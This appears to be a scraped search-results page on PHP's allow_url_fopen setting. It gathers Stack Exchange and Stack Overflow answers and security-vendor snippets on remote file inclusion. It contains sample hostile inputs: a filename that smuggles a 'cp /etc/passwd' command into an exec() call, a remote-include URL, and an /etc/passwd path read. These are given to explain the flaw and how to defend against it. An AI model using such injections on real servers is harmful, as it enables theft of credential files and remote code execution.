A sample attack scenario using allow_url_fopen that allows me to download your password file:

  1. Suppose your app allows me to provide a URL to a remote image, which you will download and use as my avatar image.
  2. I provide the following URL: "http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/foo.jpg;"
  3. Your app uses allow_url_fopen to download the file and stores it as "sbwoodside.jpg;cp%20/etc/passwd%20downloads/passwords.txt;". I have now successfully injected a command into the filename.
  4. Your app wants to compress and resize my image, so you use ImageMagick on the command line with something like exec("magick convert -size 128x128 ".$filename." ".$filename.".128.jpg")
  5. What does exec actually execute? If you haven't sanitized the filename, then it executes the following on the shell:

magick convert -size 128x128 sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt; sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt;.128.jpg

Since ; is a command delimited on the shell, that will be broken by the shell automatically into the following separate commands:

magick convert -size 128x128 sbwoodside.jpg cp /etc/passwd downloads/passwords.txt sbwoodside.jpg cp /etc/passwd downloads/passwords.txt .128.jpg

And now I just go to http://yourapp.com/downloads/passwords.txt and download your password file. Of course, I can do anything I want, since I'm executing commands as your web server on your system.

Answer from Simon Woodside on Stack Exchange
🌐
Stack Exchange
security.stackexchange.com › questions › 103427 › what-are-php-allow-url-fopen-security-risk
What are PHP allow_url_fopen security risk? - Information Security Stack Exchange
Top answer
1 of 3
6

A sample attack scenario using allow_url_fopen that allows me to download your password file:

  1. Suppose your app allows me to provide a URL to a remote image, which you will download and use as my avatar image.
  2. I provide the following URL: "http://my.malicious.example.com/sbwoodside.jpg;cp%20/etc/passwd%20downloads/foo.jpg;"
  3. Your app uses allow_url_fopen to download the file and stores it as "sbwoodside.jpg;cp%20/etc/passwd%20downloads/passwords.txt;". I have now successfully injected a command into the filename.
  4. Your app wants to compress and resize my image, so you use ImageMagick on the command line with something like exec("magick convert -size 128x128 ".$filename." ".$filename.".128.jpg")
  5. What does exec actually execute? If you haven't sanitized the filename, then it executes the following on the shell:

magick convert -size 128x128 sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt; sbwoodside.jpg;cp /etc/passwd downloads/passwords.txt;.128.jpg

Since ; is a command delimited on the shell, that will be broken by the shell automatically into the following separate commands:

magick convert -size 128x128 sbwoodside.jpg cp /etc/passwd downloads/passwords.txt sbwoodside.jpg cp /etc/passwd downloads/passwords.txt .128.jpg

And now I just go to http://yourapp.com/downloads/passwords.txt and download your password file. Of course, I can do anything I want, since I'm executing commands as your web server on your system.

2 of 3
1

It depends on you! how you designed your applications and are you considered security during all software development life-cycle?

Consider insecure code below that loads web pages according to request parameter (page):

<?php
include($_GET['page']);
?>

And now consider an attacker includes malicious PHP code by using:

?page=http://example.com/badcode-php.txt

He can then bypass all security measure from your site and do anything (accessing local files, uploading another files, etec).

So its recommended that to turn of allow_urL_fopen and allow_url_include to minimize remote file execution attack.

🌐
Acunetix
acunetix.com › vulnerabilities › web › php-allow_url_fopen-is-enabled
PHP allow_url_fopen Is Enabled - Vulnerabilities - Acunetix
When enabled, this directive allows data retrieval from remote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.
🌐
Invicti
invicti.com › web-vulnerability-scanner › vulnerabilities › php-allowurlfopen-is-enabled
PHP allow_url_fopen Is Enabled
When allow_url_fopen is enabled, some of PHP's functions that usually expect file paths can be used to receive files over the network instead of the local file system. An attacker can abuse this behavior in order to make arbitrary server-side requests.
🌐
Stack Overflow
stackoverflow.com › questions › 24049534 › is-allow-url-fopen-safe
php - Is allow_url_fopen safe? - Stack Overflow
Top answer
1 of 2
12

This is just one reason why you may want allow_url_fopen set to 0

Let's say you allow users to enter a url, and you have your server fetch this url.

You might code something like this: - YOU SHOULD NOT CODE THIS -

echo file_get_contents($_POST['url']);

Problem is that there is a security issue here. Somebody could pass a file path instead of a url and have access to your server's files.

For example, somebody might pass /etc/passwd as a url, and be able to view its contents.

Now, if allow_url_fopen were set to 0, you wouldn't be using file_get_contents to fetch URL's, you would be using CURL.

2 of 2
10

allow_url_fopen is fine. If you need the feature, enable it. There are better tools out there for loading data from remote URLs (like the curl extension), but it's good enough for some simple use cases.

Its close relative, allow_url_include, is not safe. It allows functions like include() and require() to load and run code from remote URLs, which is a really bad idea. Leave that one turned off.

In the past, allow_url_include didn't always exist as a distinct option, so it was necessary to turn allow_url_fopen off to prevent badly written scripts from including data from remote URLs. That's no longer the case, though.

🌐
GitHub
github.com › lehongchau › Repo01 › issues › 8
Acunetix - PHP allow_url_fopen enabled · Issue #8 · lehongchau/Repo01
March 4, 2020 - Target URL http://testphp.vulnweb.com/ Severity High Vulnerability Description The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote locations (web site or FTP server)....
🌐
Mannulinux
mannulinux.org › 2019 › 05 › exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction | Start With Linux | Mannu Linux
May 12, 2019 - We will bypass the Remote URL inclusion restriction and perform the exploitation of RFI even if PHP environment is configured not to include files from remote HTTP/FTP URL. PHP and SMB share file access In PHP Configuration file, "allow_url_include" wrapper by-default set to "Off" which instruct PHP not to load remote HTTP or FTP URLs and hence prevent Remote File Inclusion attack. But, PHP does not block SMB URL loading even if "allow_url_include" and "allow_url_fopen" both are set to "Off".
🌐
Fortify
vulncat.fortify.com › en › detail
Software Security | PHP Misconfiguration: allow_url_fopen Enabled
Because the value of $file is controlled by a request parameter, an attacker could violate the programmer's assumptions by providing a URL to a remote file. <?php $file = fopen ($_GET["file"], "r"); if (!$file) { // handle errors } while (!feof ($file)) { $line = fgets ($file, 1024); // operate ...
🌐
Beagle Security
beaglesecurity.com › blog › support › vulnerability › 2018 › 07 › 02 › PHP-allow_url_fopen-is-enabled.html
PHP allow_url_fopen is enabled
The allow_url_fopen carries a risk of:- Enabling Remote File Execution Access Control Bypass Information Disclosure Attacks If an attacker can inject a remote URI into the file function.
🌐
Stack Overflow
stackoverflow.com › questions › 127534 › should-i-allow-allow-url-fopen-in-php
configuration - Should I allow 'allow_url_fopen' in PHP? - Stack Overflow
Top answer
1 of 5
24

I think the answer comes down to how well you trust your developers to use the feature responsibly? Data from a external URL should be treated like any other untrusted input and as long as that is understood, what's the big deal?

The way I see it is that if you treat your developers like children and never let them handle sharp things, then you'll have developers who never learn the responsibility of writing secure code.

2 of 5
21

You definitely want allow_url_include set to Off, which mitigates many of the risks of allow_url_fopen as well.

But because not all versions of PHP have allow_url_include, best practice for many is to turn off fopen. Like with all features, the reality is that if you don't need it for your application, disable it. If you do need it, the curl module probably can do it better, and refactoring your application to use curl to disable allow_url_fopen may deter the least determined cracker.

Find elsewhere
🌐
Web24
web24.com.au › tutorials › security-issues-allow_url_fopen
Security Issues with allow_url_fopen - Web24
October 21, 2016 - If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:
🌐
Beagle Security
beaglesecurity.com › blog › vulnerability › allow-url-fopen-is-enabled.html
PHP allow_url_include is enabled
If the user inputs are not properly validated, the attacker can conduct remote file inclusion attack on the server. If allow_url_include is enabled, an attacker can get data from remote locations using functions like fopen() and file_get_contents.
🌐
Null Byte
null-byte.wonderhowto.com › how-to › exploit-remote-file-inclusion-get-shell-0187006
How to Exploit Remote File Inclusion to Get a Shell :: Null Byte
September 7, 2018 - The allow_url_fopen option allows access to files on remote hosts or servers, while the allow_url_include option allows a remote file to utilize a URL rather than a local file path.
🌐
Invicti
invicti.com › web-application-vulnerabilities › php-allow-url-fopen-is-enabled
PHP allow_url_fopen Is Enabled - Web Application Vulnerabilities | Invicti
While enabled by default in PHP, this directive significantly increases the attack surface for remote file inclusion vulnerabilities when combined with insufficient input validation. Attackers can exploit this configuration to execute malicious code hosted on external servers.
🌐
Vaadata
vaadata.com › home › technical › what is rfi? remote file inclusion exploitations and security tips
What is RFI? Remote File Inclusion Exploits & Security Tips
September 3, 2024 - Similarly, the ‘allow_url_fopen’ option, which allows PHP functions such as ‘fopen’ to treat URLs as local files, should be disabled if it is not absolutely necessary. Managing updates is crucial to maintaining the security of web ...
🌐
Exploit-DB
exploit-db.com › exploits › 3657
MySpeach 3.0.7 - Local/Remote File Inclusion - PHP webapps Exploit
April 3, 2007 - /=======================================\ | Advisory :: MySpeach <= 3.0.7 | +=======================================+---------------------------------------------------------------\ | | | Download link : http://www.graphiks.net/scripts-php/script-7-1-0.html | | Official website : www.graphiks.net | | Type : Chat without any database (only txt files) | | Vuln. found : Remote/Local File inclusion (& Full Path Disclosure) | | Conditions : Vuln #1 : PHP >= 5.0.0, register_globals = On, allow_url_fopen = On | | Vuln #2 : register_globals = On | | Risk level : High | | | +---------------------------
🌐
Blogger
poc-hack.blogspot.com › 2011 › 03 › how-to-exploit-lfi-local-file-include.html
POC HACK: How to exploit LFI (Local File Include) vulnerability on webpages
March 5, 2011 - The proper solution to this vulnerability is to modify the vulnerable code in order to prevent user control of file include directives. A PHP include vulnerability may be partially mitigated in some cases by using PHP's allow_url_fopen and ...
🌐
Exploit-DB
exploit-db.com › exploits › 48424
SimplePHPGal 0.7 - Remote File Inclusion - PHP webapps Exploit
May 5, 2020 - Only for (RFI) <?php ini_set('allow_url_fopen ', 'Off'); ?> * We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI) <?php $strpos = strpos($_GET['url'],'http://'); if(!$strpos){ include($_GET['url']); } ?> * Using str_replace we can give the given address from two characters "/", "." Let's clean up.
🌐
Hacking Articles
hackingarticles.in › home › website hacking › comprehensive guide on remote file inclusion (rfi)
Comprehensive Guide on Remote File Inclusion (RFI)
July 31, 2020 - Would it still be vulnerable to RFI? The answer is “Yes”, RFI vulnerabilities can be exploited through the SMB Server even if the “allow_url_include” or “allow_url_fopen” is set to Off.
🌐
Bobcares
bobcares.com › blog › enable-allow_url_fopen
enable allow_url_fopen : Easy way to access remote data !!
November 24, 2019 - In short, the allow_url_fopen refers to a PHP directive, which retrieves data from remote servers or websites. We can enable this via editing the php.ini, .htaccess, or via WHM interface and so on.
🌐
Medium
medium.com › @avihayeldad1 › when-phps-readfile-goes-rogue-exploiting-lfi-and-ssrf-in-a-saas-environment-ada2ea1ea6f4
When PHP's readfile() Goes Rogue: Exploiting LFI and SSRF in a SaaS Environment | Medium
June 15, 2025 - readfile() Supports URLs: Fun fact — readfile() can read remote URLs if allow_url_fopen is enabled, turning LFI into SSRF with a few keystrokes.
Related queries
remote file inclusion
php include exploit
allow_url_fopen exploit mac
rfi exploit tutorial
how to enable allow_url_include in php ini
allow_url_fopen vs allow_url_include
local file inclusion vulnerability solution
rfi exploit